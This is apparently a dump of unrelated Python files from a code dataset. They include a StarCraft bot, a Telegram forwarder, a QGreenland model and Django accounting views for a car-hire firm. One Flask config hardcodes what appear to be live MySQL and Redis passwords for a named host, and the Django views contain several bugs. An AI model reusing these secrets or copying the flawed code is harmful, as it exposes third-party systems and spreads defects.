import tasks.tasks
reload(tasks.tasks)
def main_thread():
tasks.tasks.app.worker_main()
def start_main_thread(*a, **kw):
threading.Thread(target=lambda: bootstrap_thread(main_thread)).start()
# do not join, ente needs this function to return
ente_init.set_bgthread_hook(start_main_thread)
|
19,777 | 34e9b3daa9a417920429bbee3722c7529f45e233 | import pickle
f = open('sample_pickle.dat', 'rb')
n = pickle.load(f) #讀取檔案的資料個數
for i in range(n):
x = pickle.load(f)
print(x)
f.close()
|
19,778 | 0e416140d5133217aebe4cf12544f4cd2783f6b6 | from time import sleep
for i in range(10,-1,-1):
print(f"\033[0;34m{i}\033[m")
sleep(1)
print('\033[0;33mBOOM!!!\033[0;33m') |
19,779 | bd0775290b629d65fdcdf968ccf868d8bbf72f08 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy
import random
from pysc2.lib import actions
from s2clientprotocol import sc2api_pb2 as sc_pb
import tstarbot as ts
UNIT_TYPE_HATCHERY = 86
UNIT_TYPE_DRONE= 104
class DemoPool(ts.PoolBase):
def __init__(self):
self._drone_ids = []
self._hatcherys = []
def update(self, obs):
units = obs['units']
self._locate_hatcherys(units)
self._update_drone(units)
def _locate_hatcherys(self, units):
for u in units:
if u.unit_type == UNIT_TYPE_HATCHERY:
self._hatcherys.append((u.float_attr.pos_x, u.float_attr.pos_y, u.float_attr.pos_z))
def _update_drone(self, units):
drone_ids = []
for u in units:
if u.unit_type == UNIT_TYPE_DRONE:
drone_ids.append(u.tag)
self._drone_ids = drone_ids
def get_drones(self):
return self._drone_ids
def get_hatcherys(self):
return self._hatcherys
class DemoManager(ts.ManagerBase):
def __init__(self, pool):
self._pool = pool
self._range_high = 5
self._range_low = -5
self._move_ability = 1
def execute(self):
drone_ids = self._pool.get_drones()
pos = self._pool.get_hatcherys()
print('pos=', pos)
actions = self.move_drone_random_round_hatchery(drone_ids, pos[0])
return actions
def move_drone_random_round_hatchery(self, drone_ids, pos):
length = len(drone_ids)
actions = []
for drone in drone_ids:
action = sc_pb.Action()
action.action_raw.unit_command.ability_id = self._move_ability
x = pos[0] + random.randint(self._range_low, self._range_high)
y = pos[1] + random.randint(self._range_low, self._range_high)
action.action_raw.unit_command.target_world_space_pos.x = x
action.action_raw.unit_command.target_world_space_pos.y = y
action.action_raw.unit_command.unit_tags.append(drone)
actions.append(action)
return actions
class DemoBot:
"""A random agent for starcraft."""
def __init__(self, env):
self._pools = []
self._managers = []
self._env = env
def setup(self):
demo_pool = DemoPool()
demo_manager = DemoManager(demo_pool)
self._pools.append(demo_pool)
self._managers.append(demo_manager)
self._executor = ts.ActExecutor(self._env)
def reset(self):
timesteps = self._env.reset()
return timesteps
def run(self, n):
return self._run_inner(n)
def _run_inner(self, n):
try:
"""episode loop """
step_num = 0
timesteps = self.reset()
while True:
obs = timesteps[0].observation
for pool in self._pools:
pool.update(obs)
actions = []
for manager in self._managers:
part_actions = manager.execute()
actions.extend(part_actions)
result = self._executor.exec_raw(actions)
if result[1]:
break
timesteps = result[0]
if step_num > n:
break
step_num += 1
except KeyboardInterrupt:
print("SC2Imp exception")
|
19,780 | b4ff303780e3a1004fc5c8977a691776725357dd | from telethon import TelegramClient, events
from telethon.sessions import StringSession
from telethon.tl.functions.channels import GetMessagesRequest
import logging
import redis
from text_parser import emanuelefilter, transform_text
from datetime import datetime
from config import api_hash, api_id, channel_input, channel_output, session, REDISTOGO_URL
logging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',
level=logging.WARNING)
r = redis.from_url(url=REDISTOGO_URL)
client = TelegramClient(StringSession(session), api_id, api_hash)
@client.on(
events.NewMessage(
chats= channel_input,
# pattern=r"^(BUY|SELL)\s([A-Z]*)\s[\(@at\s]*([0-9]*[.,][0-9]*)[\).]",
incoming=True,
outgoing=True
))
async def forwarder(event):
text = event.message.text
message_id = event.message.id
reply_msg = event.message.reply_to_msg_id
valid = emanuelefilter(text)
text = transform_text(text)
count = 0
for cht in channel_output:
try:
ref = int(r.get(f"{cht}-{reply_msg}").decode('utf-8'))
except:
print('Out of scope or bounds for redis')
ref = None
try:
msg_file = event.message.file.media
ext = event.message.file.ext
except:
msg_file = None
ext = None
count += 1
print(cht, count)
if valid:
try:
output_channel = await client.send_message(cht, text, file=msg_file, reply_to=ref)
r.set(f"{cht}-{event.message.id}", output_channel.id)
print(f"\u001b[32mSENT......{text}....SENT\u001b[37m....")
except:
print(f"\u001b[31mNot Sent an error occurred {text[:70]} ...Not Sent\u001b[37m...")
else:
print(f"\u001b[31mNot Sent invalid {text[:70]} ...Not Sent\u001b[37m...")
@client.on(events.NewMessage)
async def wakeup(event):
print('..')
client.start()
client.run_until_disconnected()
|
19,781 | 6aed12dac9fc59ddf68959d0aeb6fc12b0ebd095 | class Subject:
def __init__(self):
self.observers = []
def add_observer(self, observer):
self.observers.append(observer)
def remove_observer(self, observer):
self.observers.remove(observer)
def send_notification(self):
for observer in self.observers:
observer.update(self)
class CricketScore(Subject):
def __init__(self):
super(CricketScore, self).__init__()
self.observers = []
self.__runs = 0
self.__wickets = 0
@property
def runs(self):
return self.__runs
@runs.setter
def runs(self, value):
self.__runs = value
self.send_notification()
@property
def wickets(self):
return self.__wickets
@wickets.setter
def wickets(self, value):
self.__wickets = value
self.send_notification()
|
19,782 | 439a9e415703f8c556679ccddcab44589c34d385 | import os
path = os.getcwd()
class DevelopingConfig:
DEBUG = False
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://designer:sEPL7PHYNk6DGpa2@wghtstudio.cn:3306/designer?charset=UTF8MB4'
SQLALCHEMY_TRACK_MODIFICATIONS = False
REDIS = {
'password': 'gyk199941',
'host': 'wghtstudio.cn',
'port': 6379
}
class ProductionConfig:
DEBUG = False
|
19,783 | 2813c81c856032838877bbc47a528c89e617f1bb | from pathlib import Path
from typing import Any, Optional, Union
from pydantic import Field
from qgreenland.models.base_model import QgrBaseModel
from qgreenland.models.config.dataset import AnyAsset, Dataset
from qgreenland.models.config.step import AnyStep
from qgreenland.util.layer_style import get_style_filepath
from qgreenland.util.model_validators import reusable_validator, validate_paragraph_text
from qgreenland.util.model_validators.layer_style import (
validate_style_file_continuous_legend,
validate_style_file_exists,
validate_style_file_only_contains_allowed_fonts,
)
class LayerInput(QgrBaseModel):
"""The input(s) to a layer's processing pipeline."""
# TODO: just maintain ids here?
dataset: Dataset
"""The dataset providing the layer's input. Important for metadata."""
asset: AnyAsset
"""The actual input asset (file or files)."""
class Layer(QgrBaseModel):
id: str
"""Unique identifier."""
title: str
"""The layer name in QGIS Layers Panel."""
description: str = Field(..., min_length=1)
"""Descriptive text shown as hover-text in the QGIS Layer Panel."""
tags: list[str] = []
"""Additional categories that describe this data."""
in_package: bool = True
"""Is this layer in the final QGreenland zip file?"""
show: bool = False
"""Is this layer initially "checked" or visible in QGIS?"""
style: Optional[str] = Field(None, min_length=1)
"""Which style (.qml) file to use for this layer?
Omit the file extension.
"""
input: LayerInput
steps: Optional[list[AnyStep]]
_validate_description = reusable_validator("description", validate_paragraph_text)
_validate_style_file_exists = reusable_validator(
"style",
validate_style_file_exists,
)
_validate_style_file_only_contains_allowed_fonts = reusable_validator(
"style",
validate_style_file_only_contains_allowed_fonts,
)
_validate_style_file_continuous_legend = reusable_validator(
"style",
validate_style_file_continuous_legend,
)
@property
def style_filepath(self) -> Union[Path, None]:
"""Full filepath to the QML style file."""
if self.style is None:
return None
return get_style_filepath(self.style)
def __json__(self) -> dict[Any, Any]:
"""Limit child models that are output when dumping JSON.
When dumping a layer tree, we shouldn't include all the datasets and the
assets because that results in severe duplication.
"""
return self.dict(
include={
**{k: ... for k in self.dict().keys() if k != "input"},
"input": {
"dataset": {"id"},
"asset": {"id"},
},
},
exclude={
"steps": {"__all__": {"id"}},
},
)
|
19,784 | de8a1fe765c4c1c9250f241b37c45a1ae540082c | from django.shortcuts import render, redirect, HttpResponseRedirect
from accounts.forms import RegistrationForm, EditProfileForm
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.shortcuts import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from .models import User
from django.views.generic import View
from canonapp.models import *
from django.utils import timezone
from datetime import datetime,timezone
from datetime import datetime as dt
from django.db.models.functions import Length, Upper, datetime
from django.http import HttpResponse
from django.views.generic import ListView, DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy
from django import forms
from accounts.models import Staff
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect,get_object_or_404
from .models import *
from .forms import *
from datetime import datetime as dt
from datetime import datetime,timezone
from twilio.rest import Client
from twilio.base.exceptions import TwilioRestException
from django.db.models import Count, F, Value,Sum
from django.db.models.functions import Length, Upper, datetime
from django.http import HttpResponse
from django.views.generic import View
from django.utils import timezone
from .pdf_render import Render
from django.http import JsonResponse
from django.shortcuts import render, get_object_or_404
from django.db.models import Q
from .forms import *
from django.shortcuts import redirect, HttpResponseRedirect
from django.http import JsonResponse
from django.shortcuts import render, get_object_or_404, redirect
from django.db.models import Q
from django.shortcuts import render, redirect, get_object_or_404
from django.forms import ModelForm
from accounts.models import Staff
# Create your views here.
@login_required
def home(request):
return render(request, 'accounts/home.html')
@login_required
def executive_home(request):
return render(request, 'accounts/executive_home.html')
@login_required
def view_profile(request):
args = {'user': request.user}
return render(request, 'accounts/view_profile.html', args)
@login_required
def edit_profile(request):
if request.method == 'POST':
form = EditProfileForm(request.POST, instance=request.user)
if form.is_valid():
form.save()
return redirect('/account/view_profile')
else:
form = EditProfileForm(instance=request.user)
args = {'form': form}
return render(request, 'accounts/edit_profile.html', args)
@login_required
def change_password(request):
if request.method == 'POST':
form = PasswordChangeForm(data=request.POST, user = request.user)
if form.is_valid():
form.save()
update_session_auth_hash(request, form.user)
return redirect('/account/view_profile')
else:
return redirect('/account/change_password')
else:
form = PasswordChangeForm(user = request.user)
args = {'form': form}
return render(request, 'accounts/change_password.html', args)
def login_success(request):
if request.user.groups.filter(name='Manager'):
return render(request, 'accounts/home.html')
elif request.user.groups.filter(name='Executive'):
return render(request, 'accounts/executive_home.html')
elif request.user.groups.filter(name='Accountant'):
return render(request,'accountantapp/Accprofile.html')
elif request.user.groups.filter(name='Operations'):
return render(request, 'operationsapp/operations_home.html')
elif request.user.groups.filter(name='Receptionist'):
return render(request, 'receptionistapp/receptionist_home.html')
else:
return HttpResponseRedirect('Account not found')
@login_required
def executive_driver_payment_archive(request):
# when we search for monthly archived reports
if request.method == 'POST':
report_year = request.POST['report_year']
report_month=request.POST['report_month']
archived_reports=Driver_payment_Reports_Archive.objects.filter(month=report_month, year=report_year)
months= ['January','February','March', 'April', 'May', 'June', 'July','August', 'August','September','October','November', 'November',
'December']
years = [2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030,2031,2032,2033,2034,2035]
drivers=Driver.objects.all()
#getting the current time zone
today = timezone.now()
#number of records got
item_number = archived_reports.count()
# calculating the total balance
total_bal = archived_reports.aggregate(total_bal=models.Sum("balance"))
driver_total_balance = total_bal["total_bal"]
# calculating the total payments
total_pai = archived_reports.aggregate(total_pai=models.Sum("amount_paid"))
driver_total_paid = total_pai["total_pai"]
context={'archived_reports':archived_reports,'months':months,'years':years,'drivers':drivers,'driver_total_paid':driver_total_paid,'driver_total_balance':driver_total_balance,'item_number':item_number,
'today':today,'report_year':report_year,'report_month':report_month
}
return render(request,"accounts/executive_driver_payment_archive.html",context)
months= ['January','February','March', 'April', 'May', 'June', 'July','August', 'August','September','October','November', 'November',
'December']
years = [2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030,2031,2032,2033,2034,2035]
drivers=Driver.objects.all()
context={'months':months,'years':years,'drivers':drivers}
return render(request,"accounts/executive_driver_payment_archive.html",context)
########################################################
# printing archived monthly reports
########################################################
class executive_driver_payment_archive_print(View):
def get(self, request, report_month,report_year):
archived_reports=Driver_payment_Reports_Archive.objects.filter(month=report_month, year=report_year)
drivers=Driver.objects.all()
#getting the current time zone
today = timezone.now()
#number of records got
item_number = archived_reports.count()
# calculating the total balance
total_bal = archived_reports.aggregate(total_bal=models.Sum("balance"))
driver_total_balance = total_bal["total_bal"]
# calculating the total payments
total_pai = archived_reports.aggregate(total_pai=models.Sum("amount_paid"))
driver_total_paid = total_pai["total_pai"]
context={'archived_reports':archived_reports,'drivers':drivers,'driver_total_paid':driver_total_paid,'driver_total_balance':driver_total_balance,'item_number':item_number,
'today':today,'report_year':report_year,'report_month':report_month }
return Render.render('accounts/executive_driver_payment_archive_print.html', context)
#################################################################
#Staff Views
################################################################
#######create staff
@login_required
def staff_create(request):
if request.method=="POST":
form=StaffForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('staff_view')
else:
form=StaffForm()
return render(request, 'accounts/staff_create.html', {'form':form})
#################View Staff
@login_required
def staff_view(request):
items = Staff.objects.all()
context = {'items': items, }
return render(request, "accounts/view_staff.html", context)
###########edit staff
@login_required
def staff_update(request,pk):
item=get_object_or_404(Staff,pk=pk)
if request.method=="POST":
form=StaffForm(request.POST,request.FILES,instance=item)
if form.is_valid():
form.save()
return redirect('staff_view')
else:
form=StaffForm(instance=item)
return render(request, 'accounts/staff_update.html', {'form':form})
###############delete staff
@login_required
def staff_delete(request,pk):
Staff.objects.filter(id=pk).delete()
items=Staff.objects.all()
context={'items':items}
return render(request, 'accounts/view_staff.html', context)
#################################################################
#Users Views
################################################################
#######create user
@login_required
def register(request):
if request.method == 'POST':
form = RegistrationForm(request.POST)
if form.is_valid():
form.save()
return redirect('users_view')
else:
form = RegistrationForm()
return render(request, 'accounts/reg_form.html', {'form': form})
#################View users
@login_required
def users_view(request):
items = User.objects.all()
context = {'items': items, }
return render(request, "accounts/users_view.html", context)
###########edit users
@login_required
def users_edit(request,pk):
item=get_object_or_404(User,pk=pk)
if request.method=="POST":
form=RegistrationForm(request.POST,request.FILES,instance=item)
if form.is_valid():
form.save()
return redirect('users_view')
else:
form=RegistrationForm(instance=item)
return render(request, 'accounts/users_edit.html', {'form':form})
###############delete users
@login_required
def users_delete(request,pk):
User.objects.filter(id=pk).delete()
items=User.objects.all()
context={'items':items}
return render(request, 'accounts/users_view.html', context)
################################################################################
#########################################
# display_driver_financial statement
##########################################
######################################################
# accountant generate driver financial report
##############################################################
class accountant_generate_driver_financial_report(View):
@login_required
def get(self, request, driver_name):
#first get the driver name
# driver =Driver.objects.filter(pk=pk).values_list('')
#driver id to match drivers in payment table
driver = get_object_or_404(Driver, driver_name=driver_name).id
#driver name to appear on the report
driver_name = driver_name
#passing on the driver attached car
attached_car=get_object_or_404(Driver, driver_name=driver_name).attached_car
#Total balance to be paid by driver
driver_balance=get_object_or_404(Driver, driver_name=driver_name).driver_monthly_payment
#all payments made by a specific driver
payments=DriverPayment.objects.filter(driver_name=driver)
#getting today's date
today = timezone.now()
#calculating total paid so far
total= DriverPayment.objects.filter(driver_name=driver).aggregate(total_amount_paid=models.Sum("paid_amount"))
total_paid=total["total_amount_paid"]
#parameters sent to the pdf for display
params = {
'attached_car':attached_car,
'total_paid':total_paid,
'driver_balance':driver_balance,
'driver_name':driver_name,
'request': request,
'payments': payments,
'today': today,
}
return Render.render('accounts/accountant_driver_financial_report.html', params)
######################################
# Searching for archived report
#############################################
@login_required
def accountant_driver_payment_archive(request):
# when we search for monthly archived reports
if request.method == 'POST':
report_year = request.POST['report_year']
report_month=request.POST['report_month']
archived_reports=Driver_payment_Reports_Archive.objects.filter(month=report_month, year=report_year)
months= ['January','February','March', 'April', 'May', 'June', 'July','August', 'August','September','October','November', 'November',
'December']
years = [2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030,2031,2032,2033,2034,2035]
drivers=Driver.objects.all()
#getting the current time zone
today = timezone.now()
#number of records got
item_number = archived_reports.count()
# calculating the total balance
total_bal = archived_reports.aggregate(total_bal=models.Sum("balance"))
driver_total_balance = total_bal["total_bal"]
# calculating the total payments
total_pai = archived_reports.aggregate(total_pai=models.Sum("amount_paid"))
driver_total_paid = total_pai["total_pai"]
context={'archived_reports':archived_reports,'months':months,'years':years,'drivers':drivers,'driver_total_paid':driver_total_paid,'driver_total_balance':driver_total_balance,'item_number':item_number,
'today':today,'report_year':report_year,'report_month':report_month
}
return render(request,"accounts/accountant_driver_payment_archive.html",context)
months= ['January','February','March', 'April', 'May', 'June', 'July','August', 'August','September','October','November', 'November',
'December']
years = [2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030,2031,2032,2033,2034,2035]
drivers=Driver.objects.all()
context={'months':months,'years':years,'drivers':drivers}
return render(request,"accounts/accountant_driver_payment_archive.html",context)
####################################################
# CALCULATING TOTALS IN THE REPORTS #
####################################################
def salaryreport(request):
timezone.now()
current_month = datetime.datetime.now().month
queryset = Salary.objects.all().filter(Date__month=current_month).order_by('-Date')
today = timezone.now()
month = today.strftime('%B')
total = 0
for instance in queryset:
total += instance.Amount
context = {
'month': month,
'queryset': queryset,
'total': total,
}
return render(request, 'accounts/salaryindex.html', context)
# def expenditurereport(request):
def expenditurereport(request):
current_month = datetime.datetime.now().month
queryset = Spend.objects.all().filter(Date__month=current_month).order_by('-Date')
today = timezone.now()
month = today.strftime('%B')
total = 0
for instance in queryset:
total += instance.Amount
context = {
'month': month,
'queryset': queryset,
'total': total,
}
return render(request, 'accounts/expenditureindex.html', context)
# calculating totals in sundryexpense report
def sundryreport(request):
current_month = datetime.datetime.now().month
queryset = Sundry.objects.filter(Date__month=current_month).order_by('-Date')
today = timezone.now()
month = today.strftime('%B')
total = 0
for instance in queryset:
total += instance.Amount
context = {
'month': month,
'queryset': queryset,
'total': total,
}
return render(request, 'accounts/sundryindex.html', context)
####################################################
# GENERATING REPORTS IN FORM OF PDFS #
####################################################
# Printing Expenditure Report
class expenditurepdf(View):
def get(self, request):
current_month = datetime.datetime.now().month
expense = Spend.objects.filter(Date__month=current_month).order_by('-Date')
today = timezone.now()
month = today.strftime('%B')
totalexpense = 0
for instance in expense:
totalexpense += instance.Amount
expensecontext = {
'month': month,
'today': today,
'expense': expense,
'request': request,
'totalexpense': totalexpense,
}
return Render.render('accounts/expenditurepdf.html', expensecontext)
# Printing Salaries Report
class salariespdf(View):
def get(self, request):
current_month = datetime.datetime.now().month
salaries = Salary.objects.filter(Date__month=current_month).order_by('-Date')
today = timezone.now()
month = today.strftime('%B')
totalsalary = 0
for instance in salaries:
totalsalary += instance.Amount
salarycontext = {
'month': month,
'today': today,
'salaries': salaries,
'request': request,
'totalsalary': totalsalary,
}
return Render.render('accounts/pdf.html', salarycontext)
# Printing Sundry Expenses Report
class sundrypdf(View):
def get(self, request):
current_month = datetime.datetime.now().month
sundry = Sundry.objects.filter(Date__month=current_month).order_by('-Date')
today = timezone.now()
month = today.strftime('%B')
totalsundry = 0
for instance in sundry:
totalsundry += instance.Amount
sundrycontext = {
''
'month': month,
'today': today,
'sundry': sundry,
'request': request,
'totalsundry': totalsundry,
}
return Render.render('accounts/sundrypdf.html', sundrycontext)
##################################
# This produces the general financial report for all drivers
##################################
def driver_general_financial_report(request):
#when some one submits the financial report
if request.method == 'POST':
archived_year = request.POST['archived_year']
archived_month=request.POST['archived_month']
#getting all the driver_payments
all_payment_reports=Driver_Payment_Report.objects.all()
for payment_report in all_payment_reports:
driver_name=payment_report.driver_name
driver_car=payment_report.driver_car
balance=payment_report.balance
amount_paid=payment_report.amount_paid
date=payment_report.date
#getting the archives object to creation
payment_report_archive_object=Driver_payment_Reports_Archive()
payment_report_archive_object.driver_name=driver_name
payment_report_archive_object.amount_paid=amount_paid
payment_report_archive_object.driver_car=driver_car
payment_report_archive_object.balance=balance
payment_report_archive_object.date=date
payment_report_archive_object.month=archived_month
payment_report_archive_object.year=archived_year
#getting the specific driver object and updating its current balance
Driver.objects.filter(driver_name=driver_name).update(
driver_monthly_payment=F('driver_monthly_payment_ref')+balance
)
payment_report_archive_object.save()
#This deletes all the current report data after creation of a monthly archive.
all_payment_reports.delete()
#retrieving all the payment receipts
driver_receipts=DriverPayment.objects.all()
for receipt in driver_receipts:
date=receipt.date
driver_name=receipt.driver_name
paid_amount=receipt.paid_amount
paid_by=receipt.paid_by
received_by=receipt.received_by
#get the receipt archive object
payment_receipt_archive=DriverPayments_Archive()
payment_receipt_archive.date=date
payment_receipt_archive.driver_name=driver_name
payment_receipt_archive.paid_amount=paid_amount
payment_receipt_archive.paid_by=paid_by
payment_receipt_archive.received_by=received_by
payment_receipt_archive.month=archived_month
payment_receipt_archive.year=archived_year
payment_receipt_archive.save()
#this deletes all the previous driver receipts
driver_receipts.delete()
message="You have successfully archived the payment report and all payment receipts for "+archived_month+" "+archived_year
all_drivers = Driver.objects.all()
#loop through all drivers available
for driver in all_drivers:
driver_name=driver.driver_name
driver_id=driver.id
driver_car=driver.attached_car
driver_balance=driver.driver_monthly_payment
# calculating total paid so far
total = DriverPayment.objects.filter(driver_name=driver_id).aggregate(total_amount_paid=models.Sum("paid_amount"))
total_paid = total["total_amount_paid"]
report_item=Driver_Payment_Report()
report_item.driver_name=driver_name
report_item.amount_paid=total_paid
report_item.balance=driver_balance
report_item.driver_car=driver_car
# first check for availability of an object(filtering)
if Driver_Payment_Report.objects.filter(driver_name=driver_name):
Driver_Payment_Report.objects.filter(driver_name=driver_name).update(amount_paid=total_paid,balance=driver_balance)
else:
report_item.save()
items=Driver_Payment_Report.objects.all()
item_number=items.count()
#calculating the total balance
total_bal = Driver_Payment_Report.objects.aggregate(total_bal=models.Sum("balance"))
driver_total_balance = total_bal["total_bal"]
#calculating the total payments
total_pai = Driver_Payment_Report.objects.aggregate(total_pai=models.Sum("amount_paid"))
driver_total_paid = total_pai["total_pai"]
months= ['January','February','March', 'April', 'May', 'June', 'July','August', 'August','September','October','November', 'November',
'December']
years = [2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030,2031,2032,2033,2034,2035]
context={'message':message,
'months':months,
'years':years,
'driver_total_balance':driver_total_balance,
'driver_total_paid':driver_total_paid,
'items':items,
'item_number':item_number
}
return render(request, "accounts/driver_general_financial_report.html",context)
#the if for post data of archiving ends here
all_drivers = Driver.objects.all()
#loop through all drivers available
for driver in all_drivers:
driver_name=driver.driver_name
driver_id=driver.id
driver_car=driver.attached_car
driver_balance=driver.driver_monthly_payment
driver_payment_ref=driver.driver_monthly_payment_ref
# calculating total paid so far
total = DriverPayment.objects.filter(driver_name=driver_id).aggregate(total_amount_paid=models.Sum("paid_amount"))
total_paid = total["total_amount_paid"]
#Driver.objects.filter()
#report item variables
report_item=Driver_Payment_Report()
report_item.driver_name=driver_name
report_item.amount_paid=total_paid
report_item.balance=driver_balance
report_item.driver_car=driver_car
# first check for availability of an object(filtering)
if Driver_Payment_Report.objects.filter(driver_name=driver_name):
Driver_Payment_Report.objects.filter(driver_name=driver_name).update(amount_paid=total_paid,balance=driver_balance)
else:
report_item.save()
items=Driver_Payment_Report.objects.all()
item_number=items.count()
#calculating the total balance
total_bal = Driver_Payment_Report.objects.aggregate(total_bal=models.Sum("balance"))
driver_total_balance = total_bal["total_bal"]
#calculating the total payments
total_pai = Driver_Payment_Report.objects.aggregate(total_pai=models.Sum("amount_paid"))
driver_total_paid = total_pai["total_pai"]
months= ['January','February','March', 'April', 'May', 'June', 'July','August', 'August','September','October','November', 'November',
'December']
years = [2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030,2031,2032,2033,2034,2035]
context={
'months':months,
'years':years,
'driver_total_balance':driver_total_balance,
'driver_total_paid':driver_total_paid,
'items':items,
'item_number':item_number
}
return render(request, "acounts/driver_general_financial_report.html",context)
##########################################################
# printing of the general financial report
####################################################
class print_general_financial_report(View):
def get(self, request):
today = timezone.now()
items = Driver_Payment_Report.objects.all()
item_number = items.count()
# calculating the total balance
total_bal = Driver_Payment_Report.objects.aggregate(total_bal=models.Sum("balance"))
driver_total_balance = total_bal["total_bal"]
# calculating the total payments
total_pai = Driver_Payment_Report.objects.aggregate(total_pai=models.Sum("amount_paid"))
driver_total_paid = total_pai["total_pai"]
params = {
'driver_total_balance':driver_total_balance,
'driver_total_paid':driver_total_paid,
'items':items,
'item_number':item_number,
'today': today,
}
return Render.render('accounts/print_general_financial_report.html', params)
###############################################################################################
# searching for the archives
def executive_expensesarchivessearch(request):
if request.method == 'POST':
report_year = request.POST['report_year']
report_month = request.POST['report_month']
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'August', 'September', 'October', 'November','December']
years = [2019, 2020]
today = timezone.now()
archived_reports = ExpensesReportArchive.objects.filter(month=report_month, year=report_year)
total = archived_reports.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
context = {'archived_reports':archived_reports,
'months': months,
'years': years,
'total_amount': total_amount,
'today': today,
'report_year': report_year,
'report_month': report_month
}
return render(request, "accounts/expenditurearchive.html", context)
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'August', 'September','October', 'November', 'November', 'December']
years = [2019, 2020]
expenses=ExpensesReportArchive.objects.all()
context = {'months': months,
'years': years,
'expenses': expenses}
return render(request, "accounts/expenditurearchive.html", context)
def executive_salaryarchivessearch(request):
if request.method == 'POST':
report_year = request.POST['report_year']
report_month = request.POST['report_month']
archived_reports = SalaryReportArchive.objects.filter(archivedmonth=report_month, archivedyear=report_year)
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'August', 'September', 'October', 'November','December']
years = [2019, 2020]
salary = SalaryReportArchive.objects.all()
today = timezone.now()
total = archived_reports.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
context = {'archived_reports': archived_reports,
'months': months,
'years': years,
'expenses':salary,
'total_amount': total_amount,
'today': today,
'report_year': report_year,
'report_month': report_month
}
return render(request, "accounts/salaryarchive.html", context)
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'August', 'September','October', 'November', 'December']
years = [2019, 2020]
salary=SalaryReportArchive.objects.all()
context = {'months': months,
'years': years,
'salary': salary}
return render(request, "accounts/salaryarchive.html", context)
def executive_sundryarchivessearch(request):
if request.method == 'POST':
report_year = request.POST['report_year']
report_month = request.POST['report_month']
archived_reports = SundryReportArchive.objects.filter(month=report_month, year=report_year)
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'August', 'September', 'October', 'November','December']
years = [2019, 2020]
sundry = SundryReportArchive.objects.all()
today = timezone.now()
total = archived_reports.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
context = {'archived_reports': archived_reports,
'months': months,
'years': years,
'expenses':sundry,
'total_amount': total_amount,
'today': today,
'report_year': report_year,
'report_month': report_month
}
return render(request, "accounts/sundryarchive.html", context)
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July',
'August', 'August', 'September','October', 'November', 'November', 'December']
years = [2019, 2020]
sundry=SundryReportArchive.objects.all()
context = {'months': months,
'years': years,
'sundry': sundry}
return render(request, "accounts/sundryarchive.html", context)
####################################################
# GENERATING REPORTS IN FORM OF ANNUAL PDFS #
####################################################
# Printing Expenditure archived Report
class executive_expenditurearchivepdf(View):
def get(self, request, report_month, report_year):
archived_expenses = ExpensesReportArchive.objects.filter(month=report_month, year=report_year)
today = timezone.now()
month = today.strftime('%B')
total = archived_expenses.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
expensecontext = {
'today': today,
'total_amount': total_amount,
'request': request,
'archived_expenses': archived_expenses,
'report_year': report_year,
'report_month': report_month
}
return Render.render('accounts/expenditurearchivepdf.html', expensecontext)
# Printing Salaries archived Report
class executive_salaryarchivepdf(View):
def get(self, request, report_month, report_year):
archived_salary = SalaryReportArchive.objects.filter(archivedmonth=report_month, archivedyear=report_year)
today = timezone.now()
total = archived_salary.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
salarycontext = {
'today': today,
'total_amount': total_amount,
'request': request,
'archived_salary': archived_salary,
}
return Render.render('accounts/salaryarchivepdf.html', salarycontext)
# Printing Sundry Expenses archived Report
class executive_sundryarchivepdf(View):
def get(self, request, report_month, report_year):
archived_sundry = SundryReportArchive.objects.filter(month=report_month, year=report_year)
today = timezone.now()
month = today.strftime('%B')
total = archived_sundry.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
sundrycontext = {
'today': today,
'total_amount': total_amount,
'request': request,
'archived_sundry': archived_sundry,
}
return Render.render('accounts/sundryarchivepdf.html', sundrycontext)
####################################################
# ARCHIVING OF THE MONTHLY REPORTS #
####################################################
@login_required
def executive_salaryarchive(request):
salaryarchived = SalaryReportArchive.objects.all().order_by('-Date')
total = SalaryReportArchive.objects.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
context = {
'total_amount':total_amount,
'salaryarchived': salaryarchived
}
return render(request, 'accounts/salaryarchive.html', context)
@login_required
def executive_expenditurearchive(request):
expensesarchived = ExpensesReportArchive.objects.all().order_by('-Date')
total = SalaryReportArchive.objects.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
context = {
'total_amount':total_amount,
'expensesarchived':expensesarchived
}
return render(request, 'accounts/expenditurearchive.html', context)
# calculating totals in sundryexpense report
@login_required
def executive_sundryarchive(request):
sundryarchived = SundryReportArchive.objects.all().order_by('-Date')
total = SundryReportArchive.objects.aggregate(totals=models.Sum("Amount"))
total_amount = total["totals"]
context = {
'total_amount':total_amount,
'sundryarchived': sundryarchived
}
return render(request, 'accounts/sundryarchive.html', context)
|
19,785 | 563f6a614fa6c0cd9db90a68c9a90a9a5d8726c4 | from flask import Flask
app = Flask(__name__)
app.config.from_object('application.configuration.Config')
#app.config.from_envvar('APPLICATION_SETTINGS', silent=True)
import application.main
|
19,786 | e9a36d2357c5570679a256665a64691f6e571251 | # github.com
# code by prosir
def Header(self, user, password, sess):
headers = {
